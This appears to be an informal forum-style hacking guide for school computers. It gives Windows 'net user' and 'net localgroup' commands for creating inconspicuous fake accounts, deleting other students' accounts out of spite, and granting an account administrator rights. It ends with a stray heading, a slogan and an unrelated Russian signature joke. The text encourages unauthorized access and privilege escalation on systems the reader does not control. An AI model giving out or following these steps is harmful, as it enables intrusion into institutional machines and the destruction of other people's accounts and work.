Start>Run CMD
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user padonak /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
C:>net user padonak password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'HudoyPadonak' and a password of 'xren'
C:>net user HudoyPadonak xren /ADD
Right then, now that we can create accounts, let's delete them
C:>net user HudoyPadonak /DELETE
This will delete poor liddle HudoyPadonak's account. Awww. Do it to you enemies no only joking becuase they could have important work... well okay only if you REALLY hate them
Let's give you admin priveleges
C:>net localgroup administrator HudoyPadonak /ADD
This will make HudoyPadonak an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
Windows must die

Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.